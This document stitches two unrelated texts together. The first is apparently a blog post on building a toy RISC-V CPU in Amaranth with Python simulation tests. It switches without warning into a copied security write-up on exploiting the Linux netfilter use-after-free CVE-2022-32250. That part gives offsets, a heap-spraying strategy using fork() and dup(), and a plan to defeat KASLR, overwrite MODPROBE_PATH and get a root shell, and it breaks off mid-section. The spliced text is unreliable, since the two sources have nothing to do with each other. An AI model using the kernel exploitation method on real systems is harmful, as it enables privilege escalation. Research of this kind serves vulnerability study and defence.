from amaranth.build import Platform
from amaranth.sim import Simulator, Settle


class Add3Comb(Elaboratable):
    def __init__(self):
        self.count_1 = Signal(32)
        self.count_2 = Signal(32)
        self.count_3 = Signal(32)
        self.result = Signal(32)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        # technically this is not needed: a second `+` below would do
        #     but let's build the circuit exactly as shown above
        temp_sum = Signal(32)

        # define how our logic works
        m.d.comb += temp_sum.eq(self.count_1 + self.count_2)
        m.d.comb += self.result.eq(self.count_3 + temp_sum)

        return m


def test_add3comb():
    # set up our device under test
    dut = Add3Comb()

    def bench():
        # set inputs to defined values
        yield dut.count_1.eq(7)
        yield dut.count_2.eq(14)
        yield dut.count_3.eq(21)

        # let the simulation settle down, i.e. arrive at a defined state
        yield Settle()

        # check that the sum is the expected value
        assert (yield dut.result) == 42

    sim = Simulator(dut)
    sim.add_process(bench)
    sim.run()

The key takeaway here is that the lines

 m.d.comb += temp_sum.eq(self.count_1 + self.count_2)
 m.d.comb += self.result.eq(self.count_3 + temp_sum)

are executed at the same time and also whenever the inputs change.

Synchronous Logic 

There’s a second kind of commonly used logic: synchronous logic. The difference to combinational logic is that outputs only change on a clock edge. I.e. when the clock signal goes from low to high (positive edge) or vice versa (negative edge). Let’s use the adder example again. Colors as before, but we’ll use turquoise for synchronous logic.

We use positive edge triggered logic here. So unless the clock goes from low to high, both 

temp sum
 and 
result
 will never change. The following table shows how values change. Let’s furthermore assume the logic was just resetted, so outputs start at 0.

Changes highlighted in bold. This circuit takes on the expected value only after two full clock cycles. Even if the input signals are not defined in the time period after a positive edge and the next positive edge, this will not change the output in any way

Physically things are more complex (“delta time”) and this results in interesting tradeoffs between the length of combinational logic paths (number of gates, circuit length) and the attainable clock speed. Luckily this does not matter for my toy CPU.

In Amaranth we can implement this as

class Add3Sync(Elaboratable):
    def __init__(self):
        self.sync = ClockDomain("sync")
        self.count_1 = Signal(32)
        self.count_2 = Signal(32)
        self.count_3 = Signal(32)
        self.result = Signal(32)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        temp_sum = Signal(32)

        # define how our logic works
        m.d.sync += temp_sum.eq(self.count_1 + self.count_2)
        m.d.sync += self.result.eq(self.count_3 + temp_sum)

        return m


def test_add3sync():
    # set up our device under test
    dut = Add3Sync()

    def bench():
        # set inputs to defined values
        yield dut.count_1.eq(7)
        yield dut.count_2.eq(14)
        yield dut.count_3.eq(21)

        # let the simulation settle down, i.e. arrive at a defined state
        yield Settle()

        # no positive edge yet, so still at reset value
        assert (yield dut.result) == 0

        # trigger a positive edge on the clock and wait for things to settle down
        yield Tick()
        yield Settle()

        # count3 is reflect in output, since temp sum is still zero
        assert (yield dut.result) == 21

        yield Tick()
        yield Settle()

        # now both count3 and temp sum will be reflected in the output
        assert (yield dut.result) == 42

    sim = Simulator(dut)
    sim.add_process(bench)
    sim.add_clock(1e-6)
    sim.run()

CPU design 

Armed with this knowledge I figured out which things needed to happen in parallel and which things in sequence.

So if we have an ALU related instruction it would work like this:

  1. in parallel
    • read instruction from ROM at the instruction address,
    • decode the instruction,
    • read register values and if present immediate value,
    • compute the result in the ALU,
    • assign ALU result to destination register (not yet visible!)
    • increment instruction address by 4 bytes (not yet visible!)
  2. wait for positive clock edge, giving step 1 time to settle, and in the following instant
    • update instruction address, making the new value visible
    • update destination register value, making the new value visible
  3. repeat, starting at 1.

Iteratively creating a diagrams of how things should work was immensely helpful. Below is a simplified version of my CPU design, though it lacks many of the control signals and special cases for operations related to jumping and branching. Please view in full screen mode, where you can also toggle ALU or LSU layers to make it easier to read. Colors here are just to help with readability of the diagram.

Now let’s talk about the CPU components in detail. Designing them reminded me a lot about functional programming, where the parameters of a function and types naturally guide the implementation. All necessary details about the RISC-V instruction set are specified in detail in the spec.

ALU 

Compute 

data1 $OPERATION data2
. I decided to merge the branch unit into the ALU, so there’s a branch for 
is_branch
.

class ALU(Elaboratable):
    def __init__(self):
        # if set to 0, then normal ALU operation,
        #     otherwise treat funct3 as branch condition operator
        self.i_is_branch = Signal(1)

        # operation, e.g. "add" or "xor", from decoder
        self.i_funct3 = Signal(3)

        # sub-operation, e.g. "sub" for "add", from decodert
        self.i_funct7 = Signal(7)

        # value of register 1
        self.i_data1 = SignedSignal(32)

        # value of register 2 or immediate
        self.i_data2 = SignedSignal(32)

        # computation result
        self.o_result = SignedSignal(32)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        # this ALU also implements branch logic
        with m.If(self.i_is_branch == 0):
            # normal ALU
            with m.Switch(self.i_funct3):
                with m.Case(FUNCT3_OP_XOR):
                    m.d.comb += self.o_result.eq(self.i_data1 ^ self.i_data2)
                with m.Case(FUNCT3_OP_SLL):
                    shift_amount = self.i_data2[0:5]
                    m.d.comb += self.o_result.eq(
                        self.i_data1.as_unsigned() << shift_amount)
                # ...

In this snippet you can see how Amaranth is really a code generator: Instead of using the normal 

switch
and 
if
 statements, which control Python flow, you have to use the 
m.Switch
 etc. methods on the module.

Decoder 

Provide all necessary signals to control execution.

class InstructionDecoder(Elaboratable):
    def __init__(self):
        self.i_instruction = Signal(32)
        self.i_instruction_address = Signal(32)

        # select signals for register file
        self.o_rs1 = Signal(5)
        self.o_rs2 = Signal(5)
        self.o_rd = Signal(5)
        self.o_rd_we = Signal(1)

        # ALU / LSU operations
        self.o_funct3 = Signal(3)
        self.o_funct7 = Signal(7)

        # immediate value
        self.o_imm = SignedSignal(32)

        # control signals
        self.o_invalid = Signal(1)
        self.o_has_imm = Signal(1)
        self.o_is_branch = Signal(1)
        self.o_is_memory = Signal(2)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        m.d.comb += self.o_invalid.eq(0)
        m.d.comb += self.o_is_branch.eq(0)

        opcode = self.i_instruction[0:7]

        with m.Switch(opcode):
            with m.Case(OPCODE_OP_IMM):
                # rd = rs1 $OP imm
                # use ALU with immediate
                m.d.comb += [
                    self.o_rd.eq(self.i_instruction[7:12]),
                    self.o_rd_we.eq(1),
                    self.o_funct3.eq(self.i_instruction[12:15]),
                    self.o_rs1.eq(self.i_instruction[15:20]),
                    self.o_rs2.eq(0),
                    self.o_imm.eq(self.i_instruction[20:32]),
                    self.o_has_imm.eq(1),
                    self.o_funct7.eq(0),
                ]
            # ...

Register File 

Implement 32 registers. Special case: register 

x0
 is hard-wired to zero, by not allowing writes to it.

I’m not sure if this is the best implementation, but it works well in simulation so far.

class RegisterFile(Elaboratable):
    def __init__(self):
        self.sync = ClockDomain("sync")

        self.i_select_rs1 = Signal(5)
        self.i_select_rs2 = Signal(5)
        self.i_select_rd = Signal(5)

        self.i_we = Signal(1)
        self.i_data = SignedSignal(32)

        self.o_rs1_value = SignedSignal(32)
        self.o_rs2_value = SignedSignal(32)

        self.registers = Signal(32 * 32)

        self.ports = [self.sync, self.i_select_rs1, self.i_select_rs2, self.i_select_rd, self.i_data, self.i_we]

    def elaborate(self, _: Platform) -> Module:
        """
        on clock edge if i_we is set: stores i_data at reg[i_select_rd]
        combinationally returns register values
        """

        m = Module()

        m.d.comb += [
            self.o_rs1_value.eq(self.registers.word_select(self.i_select_rs1, 32)),
            self.o_rs2_value.eq(self.registers.word_select(self.i_select_rs2, 32)),
        ]

        with m.If((self.i_we == 1) & (self.i_select_rd != 0)):
            m.d.sync += self.registers.word_select(self.i_select_rd, 32).eq(self.i_data)

        return m

Program Counter 

The simplest component: we start executing programs at 0x1000 and then go to the next instruction. The decoder computes offset based on the instruction to allow both absolute and relative jumps.

class ProgramCounter(Elaboratable):
    def __init__(self):
        self.sync = ClockDomain("sync")
        self.i_offset = SignedSignal(32)
        self.o_instruction_address = Signal(32, reset=0x1000)

        self.ports = [self.o_instruction_address]

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        m.d.sync += self.o_instruction_address.eq(self.o_instruction_address + self.i_offset)

        return m

Load Store Unit 

I’m co-simulating this part, so there is no implementation. Also simulating even small amounts of memory turned out to be way to slow. I hope to find more time in the future to complete this part of the project. And then also run it with real memory on an FPGA instead of just in simulation.

But let’s at least discuss the most interesting aspect of memory: Memory is usually very slow compared to the CPU. So the CPU has to be stalled, i.e. wait, while we are waiting for the memory to execute the read or write. In my design I have defined an 

o_done
 signal. This signal tells the control unit to not advance the program counter until the result is available. Not sure if this is the best approach, but it works for now.

class LoadStoreUnit(Elaboratable):
    def __init__(self):
        self.sync = ClockDomain("sync")

        # from decoder, not in spec, internal control signals
        self.i_lsu_mode = Signal(2)

        # from decoder, memory operation
        self.i_funct3 = Signal(3)

        # address
        self.i_address_base = Signal(32)
        self.i_address_offset = SignedSignal(12)

        # reading / writing
        self.i_data = Signal(32)
        self.o_data = Signal(32)

        # 
        self.o_done = Signal(1)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        # empty by design: this is co-simulated

        return m

Tieing it all together and testing it 

The control unit connects all modules, as described in the simplified diagram above. And uses the control logic from the decoder to correctly advance the program counter.

Instead of showing the boring glue code, here’s how I’m testing the CPU via simulation. The assembly program is designed to set registers to certain values, that can be checked afterwards. It does not follow any ABI constraints.

def test_cpu():
    dut = CPU()
    sim = Simulator(dut)

    rom = [
        0x02A00093,  # addi x1 x0 42   --> x1 = 42
        0x00100133,  # add x2 x0 x1    --> x2 = 42
        0x123451B7,  # lui x3 0x12345  --> x3 = 0x12345
        0x00208463,  # beq x1 x2 8     --> skip the next instruction
        0x00700193,  # addi x3 x0 7    [skipped]
        0x00424233,  # xor x4 x4 x4    --> x4 = 0
        0x00A00293,  # addi x5 x0 10   --> x5 = 10
        0x00120213,  # addi x4 x4 1    --> x4 = x4 + 1
        0x00520463,  # beq x4 x5 8     --> skip the next instruction
        0xFF9FF36F,  # jal x6 -8       --> jump up; effectively setting x4 = 10
                     #                     also setting x6 = pc + 4
        0x000013B7,  # lui x7 0x1      --> x7 = 0x1000
        0x03438467,  # jalr x8 x7 52   --> skip the next instruction
        0x00634333,  # xor x6 x6 x6    [skipped]
        0x100004B7,  # lui x9 0x10000  --> x9 = 0x1000_0000
        0x0324A503,  # lw x10 50 x9    --> x10 = *((int32*)(mem_u8_ptr[x9 + 0x32]))
        0x00000013,  # nop
        0,
    ]

    ram = [0 for x in range(128)]
    ram[0x32 + 3], ram[0x32 + 2], ram[0x32 + 1], ram[0x32] = 0xC0, 0xFF, 0xEE, 0x42

    done = [0]

    def bench():
        assert (yield dut.o_tmp_pc) == 0x1000

        while True:
            instr_addr = yield dut.o_tmp_pc
            print("instr addr: ", hex(instr_addr))
            rom_addr = (instr_addr - 0x1000) // 4

            if rom[rom_addr] == 0:
                done[0] = 1
                print("bench: done.")
                break

            print("instr: ", hex(rom[rom_addr]))

            yield dut.i_tmp_instruction.eq(rom[rom_addr])
            yield Settle()

            assert (yield dut.decoder.o_invalid) == False

            yield Tick()
            yield Settle()

        read_reg = lambda x: dut.registers.registers.word_select(x, 32)

        assert (yield read_reg(1)) == 42
        assert (yield read_reg(2)) == 42
        assert (yield read_reg(3)) == 0x12345000
        assert (yield read_reg(5)) == 10
        assert (yield read_reg(4)) == 10
        assert (yield read_reg(6)) == 0x1000 + 4 * rom.index(0xFF9FF36F) + 4
        assert (yield read_reg(7)) == 0x1000
        assert (yield read_reg(8)) == 0x1000 + 4 * rom.index(0x03438467) + 4
        assert (yield read_reg(9)) == 0x1000_0000
        assert (yield read_reg(10)) == 0xC0FFEE42

        yield Passive()

    def memory_cosim():
        lsu = dut.lsu

        was_busy = False

        while not done[0]:
            lsu_mode = yield lsu.i_lsu_mode
            if lsu_mode == INTERNAL_LSU_MODE_DISABLED:
                was_busy = False
                yield lsu.o_data.eq(0)
                yield lsu.o_done.eq(0)
            elif lsu_mode == INTERNAL_LSU_MODE_LOAD and was_busy is False:
                was_busy = True
                base = yield lsu.i_address_base
                offset = yield lsu.i_address_offset
                addr = base + offset
                funct3 = yield lsu.i_funct3
                print(f"memory read request: addr={hex(addr)}")

                yield Tick()  # a read takes a while
                yield Tick()
                yield Tick()

                ram_offset = addr - 0x10000000
                if funct3 == FUNCT3_LOAD_W:
                    value = (ram[ram_offset + 3] << 24) | (ram[ram_offset + 2] << 16) | (ram[ram_offset + 1] << 8) | ram[ram_offset]
                # ...

                yield lsu.o_data.eq(value)
                yield lsu.o_done.eq(1)
            # ...

            yield Tick()
        print("memory_cosim: done.")

        yield Passive()

    sim.add_clock(1e-6)
    sim.add_process(bench)
    sim.add_process(memory_cosim)
    sim.run()

Conclusion 

My development time ran out before I completed the project, so no game of life on my toy CPU for now. So what’s missing?

  • memory mapped I/O, so that instead of keeping the LEDs in memory, signals / pins of the CPU are used,
  • adding support for a few missing read / write operations to the memory controller (read byte, write byte),
  • integrating the emulator and simulator, re-using the existing debugger user interface,
  • and then likely spending some time on debugging,
  • maybe porting the simulator to Verilator or another framework to make it fast enough.

But I thought having a blog post is much better than completing this experiment now. I hope to find time in the future to again work on this, finally run game of life on my CPU and actually run it in an FPGA. That would be fun.

But the best part is really: I’ve learned so much as you’ve read. Try it yourself. Thank you for reading 🙂

Full source code 

You can find my source code at https://github.com/fnoeding/fpga-experiments . It’s not as clean as the snippets above, but I hope it provides additional context if you’d like to dive deeper.

Additional Material 

If you want to learn more I’ve collected some links that helped me below:

Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg

Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg

Original text by Sergi Martinez

Overview

It’s been a while since our last technical blogpost, so here’s one right on time for the Christmas holidays. We describe a method to exploit a use-after-free in the Linux kernel when objects are allocated in a specific slab cache, namely the 

kmalloc-cg
 series of SLUB caches used for cgroups. This vulnerability is assigned CVE-2022-32250 and exists in Linux kernel versions 5.18.1 and prior.

The use-after-free vulnerability in the Linux kernel netfilter subsystem was discovered by NCC Group’s Exploit Development Group (EDG). They published a very detailed write-up with an in-depth analysis of the vulnerability and an exploitation strategy that targeted Linux Kernel version 5.13. Additionally, Theori published their own analysis and exploitation strategy, this time targetting the Linux Kernel version 5.15. We strongly recommend having a thorough read of both articles to better understand the vulnerability prior to reading this post, which almost exclusively focuses on an exploitation strategy that works on the latest vulnerable version of the Linux kernel, version 5.18.1.

The aforementioned exploitation strategies are different from each other and from the one detailed here since the targeted kernel versions have different peculiarities. In version 5.13, allocations performed with either the 

GFP_KERNEL
 flag or the 
GFP_KERNEL_ACCOUNT
 flag are served by the 
kmalloc-*
 slab caches. In version 5.15, allocations performed with the 
GFP_KERNEL_ACCOUNT
 flag are served by the 
kmalloc-cg-*
 slab caches. While in both 5.13 and 5.15 the affected object, 
nft_expr,
 is allocated using 
GFP_KERNEL,&nbsp;
the difference in exploitation between them arises because a commonly used heap spraying object, the System V message structure (
struct msg_msg)
, is served from 
kmalloc-*
 in 5.13 but from 
kmalloc-cg-*
 in 5.15. Therefore, in 5.15, 
struct msg_msg
 cannot be used to exploit this vulnerability.

In 5.18.1, the object involved in the use-after-free vulnerability, 

nft_expr,&nbsp;
is itself allocated with 
GFP_KERNEL_ACCOUNT
 in the 
kmalloc-cg-*
 slab caches. Since the exploitation strategies presented by the NCC Group and Theori rely on objects allocated with  
GFP_KERNEL,&nbsp;
they do not work against the latest vulnerable version of the Linux kernel.

The subject of this blog post is to present a strategy that works on the latest vulnerable version of the Linux kernel.

Vulnerability

Netfilter sets can be created with a maximum of two associated expressions that have the 

NFT_EXPR_STATEFUL
 flag. The vulnerability occurs when a set is created with an associated expression that does not have the 
NFT_EXPR_STATEFUL
 flag, such as the 
dynset
 and 
lookup
 expressions. These two expressions have a reference to another set for updating and performing lookups, respectively. Additionally, to enable tracking, each set has a bindings list that specifies the objects that have a reference to them.

During the allocation of the associated 

dynset
 or 
lookup
 expression objects, references to the objects are added to the bindings list of the referenced set. However, when the expression associated to the set does not have the 
NFT_EXPR_STATEFUL
 flag, the creation is aborted and the allocated expression is destroyed. The problem occurs during the destruction process where the bindings list of the referenced set is not updated to remove the reference, effectively leaving a dangling pointer to the freed expression object. Whenever the set containing the dangling pointer in its bindings list is referenced again and its bindings list has to be updated, a use-after-free condition occurs.

Exploitation

Before jumping straight into exploitation details, first let’s see the definition of the structures involved in the vulnerability: 

nft_set
nft_expr
nft_lookup
, and 
nft_dynset
.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L502

struct nft_set {
        struct list_head           list;                 /*     0    16 */
        struct list_head           bindings;             /*    16    16 */
        struct nft_table *         table;                /*    32     8 */
        possible_net_t             net;                  /*    40     8 */
        char *                     name;                 /*    48     8 */
        u64                        handle;               /*    56     8 */
        /* --- cacheline 1 boundary (64 bytes) --- */
        u32                        ktype;                /*    64     4 */
        u32                        dtype;                /*    68     4 */
        u32                        objtype;              /*    72     4 */
        u32                        size;                 /*    76     4 */
        u8                         field_len[16];        /*    80    16 */
        u8                         field_count;          /*    96     1 */

        /* XXX 3 bytes hole, try to pack */

        u32                        use;                  /*   100     4 */
        atomic_t                   nelems;               /*   104     4 */
        u32                        ndeact;               /*   108     4 */
        u64                        timeout;              /*   112     8 */
        u32                        gc_int;               /*   120     4 */
        u16                        policy;               /*   124     2 */
        u16                        udlen;                /*   126     2 */
        /* --- cacheline 2 boundary (128 bytes) --- */
        unsigned char *            udata;                /*   128     8 */

        /* XXX 56 bytes hole, try to pack */

        /* --- cacheline 3 boundary (192 bytes) --- */
        const struct nft_set_ops  * ops __attribute__((__aligned__(64))); /*   192     8 */
        u16                        flags:14;             /*   200: 0  2 */
        u16                        genmask:2;            /*   200:14  2 */
        u8                         klen;                 /*   202     1 */
        u8                         dlen;                 /*   203     1 */
        u8                         num_exprs;            /*   204     1 */

        /* XXX 3 bytes hole, try to pack */

        struct nft_expr *          exprs[2];             /*   208    16 */
        struct list_head           catchall_list;        /*   224    16 */
        unsigned char              data[] __attribute__((__aligned__(8))); /*   240     0 */

        /* size: 256, cachelines: 4, members: 29 */
        /* sum members: 176, holes: 3, sum holes: 62 */
        /* sum bitfield members: 16 bits (2 bytes) */
        /* padding: 16 */
        /* forced alignments: 2, forced holes: 1, sum forced holes: 56 */
} __attribute__((__aligned__(64)));

The 

nft_set
 structure represents an nftables set, a built-in generic infrastructure of nftables that allows using any supported selector to build sets, which makes possible the representation of maps and verdict maps (check the corresponding nftables wiki entry for more details).

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L347

/**
 *	struct nft_expr - nf_tables expression
 *
 *	@ops: expression ops
 *	@data: expression private data
 */
struct nft_expr {
	const struct nft_expr_ops	*ops;
	unsigned char			data[]
		__attribute__((aligned(__alignof__(u64))));
};

The 

nft_expr
 structure is a generic container for expressions. The specific expression data is stored within its 
data
 member. For this particular vulnerability the relevant expressions are 
nft_lookup
 and 
nft_dynset
, which are used to perform lookups on sets or update dynamic sets respectively.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/net/netfilter/nft_lookup.c#L18

struct nft_lookup {
        struct nft_set *           set;                  /*     0     8 */
        u8                         sreg;                 /*     8     1 */
        u8                         dreg;                 /*     9     1 */
        bool                       invert;               /*    10     1 */

        /* XXX 5 bytes hole, try to pack */

        struct nft_set_binding     binding;              /*    16    32 */

        /* XXX last struct has 4 bytes of padding */

        /* size: 48, cachelines: 1, members: 5 */
        /* sum members: 43, holes: 1, sum holes: 5 */
        /* paddings: 1, sum paddings: 4 */
        /* last cacheline: 48 bytes */
};

nft_lookup
 expressions have to be bound to a given set on which the lookup operations are performed.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/net/netfilter/nft_dynset.c#L15

struct nft_dynset {
        struct nft_set *           set;                  /*     0     8 */
        struct nft_set_ext_tmpl    tmpl;                 /*     8    12 */

        /* XXX last struct has 1 byte of padding */

        enum nft_dynset_ops        op:8;                 /*    20: 0  4 */

        /* Bitfield combined with next fields */

        u8                         sreg_key;             /*    21     1 */
        u8                         sreg_data;            /*    22     1 */
        bool                       invert;               /*    23     1 */
        bool                       expr;                 /*    24     1 */
        u8                         num_exprs;            /*    25     1 */

        /* XXX 6 bytes hole, try to pack */

        u64                        timeout;              /*    32     8 */
        struct nft_expr *          expr_array[2];        /*    40    16 */
        struct nft_set_binding     binding;              /*    56    32 */

        /* XXX last struct has 4 bytes of padding */

        /* size: 88, cachelines: 2, members: 11 */
        /* sum members: 81, holes: 1, sum holes: 6 */
        /* sum bitfield members: 8 bits (1 bytes) */
        /* paddings: 2, sum paddings: 5 */
        /* last cacheline: 24 bytes */
};

nft_dynset
 expressions have to be bound to a given set on which the add, delete, or update operations will be performed.

When a given 

nft_set
 has expressions bound to it, they are added to the 
nft_set.bindings
 double linked list. A visual representation of an 
nft_set
 with 2 expressions is shown in the diagram below.

The 

binding
 member of the 
nft_lookup
 and 
nft_dynset
 expressions is defined as follows:

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L576

/**
 *	struct nft_set_binding - nf_tables set binding
 *
 *	@list: set bindings list node
 *	@chain: chain containing the rule bound to the set
 *	@flags: set action flags
 *
 *	A set binding contains all information necessary for validation
 *	of new elements added to a bound set.
 */
struct nft_set_binding {
	struct list_head		list;
	const struct nft_chain		*chain;
	u32				flags;
};

The important member in our case is the 

list
 member. It is of type 
struct list_head
, the same as the 
nft_lookup.binding
 and 
nft_dynset.binding
 members. These are the foundation for building a double linked list in the kernel. For more details on how linked lists in the Linux kernel are implemented refer to this article.

With this information, let’s see what the vulnerability allows to do. Since the UAF occurs within a double linked list let’s review the common operations on them and what that implies in our scenario. Instead of showing a generic example, we are going to use the linked list that is build with the 

nft_set
 and the expressions that can be bound to it.

In the diagram shown above, the simplified pseudo-code for removing the 

nft_lookup
 expression from the list would be:

nft_lookup.binding.list->prev->next = nft_lookup.binding.list->next
nft_lookup.binding.list->next->prev = nft_lookup.binding.list->prev

This code effectively writes the address of 

nft_dynset.binding
 in 
nft_set.bindings.next
, and the address of 
nft_set.bindings
 in 
nft_dynset.binding.list-&gt;prev
. Since the 
binding
 member of 
nft_lookup
 and 
nft_dynset
 expressions are defined at different offsets, the write operation is done at different offsets.

With this out of the way we can now list the write primitives that this vulnerability allows, depending on which expression is the vulnerable one:

  • nft_lookup
    : Write an 8-byte address at offset 24 (
    binding.list-&gt;next
    ) or offset 32 (
    binding.list-&gt;prev
    ) of a freed 
    nft_lookup
     object.
  • nft_dynset
    : Write an 8-byte address at offset 64 (
    binding.list-&gt;next
    ) or offset 72 (
    binding.list-&gt;prev
    ) of a freed 
    nft_dynset
     object.

The offsets mentioned above take into account the fact that 

nft_lookup
 and 
nft_dynset
 expressions are bundled in the 
data
 member of an 
nft_expr
 object (the data member is at offset 8).

In order to do something useful with the limited write primitves that the vulnerability offers we need to find objects allocated within the same slab caches as the 

nft_lookup
 and 
nft_dynset
 expression objects that have an interesting member at the listed offsets.

As mentioned before, in Linux kernel 5.18.1 the 

nft_expr
 objects are allocated using the 
GFP_KERNEL_ACCOUNT
 flag, as shown below.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/net/netfilter/nf_tables_api.c#L2866

static struct nft_expr *nft_expr_init(const struct nft_ctx *ctx,
				      const struct nlattr *nla)
{
	struct nft_expr_info expr_info;
	struct nft_expr *expr;
	struct module *owner;
	int err;

	err = nf_tables_expr_parse(ctx, nla, &expr_info);
	if (err < 0)
            goto err1;
        err = -ENOMEM;

        expr = kzalloc(expr_info.ops->size, GFP_KERNEL_ACCOUNT);
	if (expr == NULL)
	    goto err2;

	err = nf_tables_newexpr(ctx, &expr_info, expr);
	if (err < 0)
            goto err3;

        return expr;
err3:
        kfree(expr);
err2:
        owner = expr_info.ops->type->owner;
	if (expr_info.ops->type->release_ops)
	    expr_info.ops->type->release_ops(expr_info.ops);

	module_put(owner);
err1:
	return ERR_PTR(err);
}

Therefore, the objects suitable for exploitation will be different from those of the publicly available exploits targetting version 5.13 and 5.15.

Exploit Strategy

The ultimate primitives we need to exploit this vulnerability are the following:

  • Memory leak primitive: Mainly to defeat KASLR.
  • RIP control primitive: To achieve kernel code execution and escalate privileges.

However, neither of these can be achieved by only using the 8-byte write primitive that the vulnerability offers. The 8-byte write primitive on a freed object can be used to corrupt the object replacing the freed allocation. This can be leveraged to force a partial free on either the 

nft_set
nft_lookup
 or the 
nft_dynset
 objects.

Partially freeing 

nft_lookup
 and 
nft_dynset
 objects can help with leaking pointers, while partially freeing an 
nft_set
 object can be pretty useful to craft a partial fake 
nft_set
 to achieve RIP control, since it has an 
ops
 member that points to a function table.

Therefore, the high-level exploitation strategy would be the following:

  1. Leak the kernel image base address.
  2. Leak a pointer to an 
    nft_set
     object.
  3. Obtain RIP control.
  4. Escalate privileges by overwriting the kernel’s 
    MODPROBE_PATH
     global variable.
  5. Return execution to userland and drop a root shell.

The following sub-sections describe how this can be achieved.

Partial Object Free Primitive

A partial object free primitive can be built by looking for a kernel object allocated with 

GFP_KERNEL_ACCOUNT
 within kmalloc-cg-64 or kmalloc-cg-96, with a pointer at offsets 24 or 32 for kmalloc-cg-64 or at offsets 64 and 72 for kmalloc-cg-96. Afterwards, when the object of interest is destroyed, 
kfree()
 has to be called on that pointer in order to partially free the targeted object.

One of such objects is the 

fdtable
 object, which is meant to hold the file descriptor table for a given process. Its definition is shown below.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/fdtable.h#L27

struct fdtable {
        unsigned int               max_fds;              /*     0     4 */

        /* XXX 4 bytes hole, try to pack */

        struct file * *            fd;                   /*     8     8 */
        long unsigned int *        close_on_exec;        /*    16     8 */
        long unsigned int *        open_fds;             /*    24     8 */
        long unsigned int *        full_fds_bits;        /*    32     8 */
        struct callback_head       rcu __attribute__((__aligned__(8))); /*    40    16 */

        /* size: 56, cachelines: 1, members: 6 */
        /* sum members: 52, holes: 1, sum holes: 4 */
        /* forced alignments: 1 */
        /* last cacheline: 56 bytes */
} __attribute__((__aligned__(8)));

The size of an 

fdtable
 object is 56, is allocated in the kmalloc-cg-64 slab and thus can be used to replace 
nft_lookup
 objects. It has a member of interest at offset 24 (
open_fds
), which is a pointer to an unsigned long integer array. The allocation of 
fdtable
 objects is done by the kernel function 
alloc_fdtable()
, which can be reached with the following call stack.

alloc_fdtable()
 |  
 +- dup_fd()
    |
    +- copy_files()
      |
      +- copy_process()
        |
        +- kernel_clone()
          |
          +- fork() syscall

Therefore, by calling the 

fork()
 system call the current process is copied and thus the currently open files. This is done by allocating a new file descriptor table object (
fdtable
), if required, and copying the currently open file descriptors to it. The allocation of a new 
fdtable
 object only happens when the number of open file descriptors exceeds 
NR_OPEN_DEFAULT
, which is defined as 64 on 64-bit machines. The following listing shows this check.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/fs/file.c#L316

/*
 * Allocate a new files structure and copy contents from the
 * passed in files structure.
 * errorp will be valid only when the returned files_struct is NULL.
 */
struct files_struct *dup_fd(struct files_struct *oldf, unsigned int max_fds, int *errorp)
{
        struct files_struct *newf;
        struct file **old_fds, **new_fds;
        unsigned int open_files, i;
        struct fdtable *old_fdt, *new_fdt;

        *errorp = -ENOMEM;
        newf = kmem_cache_alloc(files_cachep, GFP_KERNEL);
        if (!newf)
                goto out;

        atomic_set(&newf->count, 1);

        spin_lock_init(&newf->file_lock);
        newf->resize_in_progress = false;
        init_waitqueue_head(&newf->resize_wait);
        newf->next_fd = 0;
        new_fdt = &newf->fdtab;

[1]

        new_fdt->max_fds = NR_OPEN_DEFAULT;
        new_fdt->close_on_exec = newf->close_on_exec_init;
        new_fdt->open_fds = newf->open_fds_init;
        new_fdt->full_fds_bits = newf->full_fds_bits_init;
        new_fdt->fd = &newf->fd_array[0];

        spin_lock(&oldf->file_lock);
        old_fdt = files_fdtable(oldf);
        open_files = sane_fdtable_size(old_fdt, max_fds);

        /*
         * Check whether we need to allocate a larger fd array and fd set.
         */

[2]

        while (unlikely(open_files > new_fdt->max_fds)) {
                spin_unlock(&oldf->file_lock);

                if (new_fdt != &newf->fdtab)
                        __free_fdtable(new_fdt);

[3]

                new_fdt = alloc_fdtable(open_files - 1);
                if (!new_fdt) {
                        *errorp = -ENOMEM;
                        goto out_release;
                }

[Truncated]

        }

[Truncated]

        return newf;

out_release:
        kmem_cache_free(files_cachep, newf);
out:
        return NULL;
}

At [1] the 

max_fds
 member of 
new_fdt
 is set to 
NR_OPEN_DEFAULT
. Afterwards, at [2] the loop executes only when the number of open files exceeds the 
max_fds
 value. If the loop executes, at [3] a new 
fdtable
 object is allocated via the 
alloc_fdtable()
 function.

Therefore, to force the allocation of 

fdtable
 objects in order to replace a given free object from kmalloc-cg-64 the following steps must be taken:

  1. Create more than 64 open file descriptors. This can be easily done by calling the 
    dup()
     function to duplicate an existing file descriptor, such as the 
    stdout
    . This step should be done before triggering the free of the object to be replaced with an 
    fdtable
     object, since the 
    dup()
     system call also ends up allocating 
    fdtable
     objects that can interfere.
  2. Once the target object has been freed, fork the current process a large number of times. Each 
    fork()
     execution creates one 
    fdtable
     object.

The free of the 

open_fds
 pointer is triggered when the 
fdtable
 object is destroyed in the 
__free_fdtable()
 function.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/fs/file.c#L34

static void __free_fdtable(struct fdtable *fdt)
{
        kvfree(fdt->fd);
        kvfree(fdt->open_fds);
        kfree(fdt);
}

Therefore, the partial free via the overwritten 

open_fds
 pointer can be triggered by simply terminating the child process that allocated the 
fdtable
 object.

Leaking Pointers

The exploit primitive provided by this vulnerability can be used to build a leaking primitive by overwriting the vulnerable object with an object that has an area that will be copied back to userland. One such object is the System V message represented by the 

msg_msg
structure, which is allocated in 
kmalloc-cg-*
 slab caches starting from kernel version 5.14.

The 

msg_msg
 structure acts as a header of System V messages that can be created via the userland 
msgsnd()
 function. The content of the message can be found right after the header within the same allocation. System V messages are a widely used exploit primitive for heap spraying.

